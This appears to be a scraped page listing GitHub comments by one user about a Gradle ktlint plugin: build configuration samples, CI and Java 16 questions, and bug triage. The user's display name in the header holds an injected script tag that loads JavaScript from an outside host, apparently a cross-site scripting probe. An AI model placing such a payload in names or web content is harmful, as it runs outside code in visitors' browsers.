Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

Results 596 comments of Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

@ColtonIdle would you be willing to contribute a sample or some changes to the README?

I'd actually recommend the following, if possible. ```kotlin plugins { id("org.jlleitschuh.gradle.ktlint").version("").apply(false) } subprojects { apply(plugin="org.jlleitschuh.gradle.ktlint") // Version is inherited from parent } ``` Or, for Groovy: ```gradle plugins { id...

Is this a use case we really want to cover? If so, do we want to allow the user to opt-out of certain tasks being generated? Can we do so...

Can you post the exact errors your getting?

@kritikapandey-jupiter looks like you're running into #553

Supposedly, support for Java 16 is only in Gradle 7. I'd advise that we add it to the matrix for CI and see what fails.

This stack trace doesn't seem to have our code anywhere in the stack, that seems to indicate that there is some bug in Gradle. I'd suggest opening a bug in...

Proposed fix: https://github.com/gradle/gradle/pull/19170 Idk if that will actually fix the issue, but it might.

Has this only become an issue since updating, or did you have this problem with `10.2.1`?

I believe that this is now outdated by #597, correct?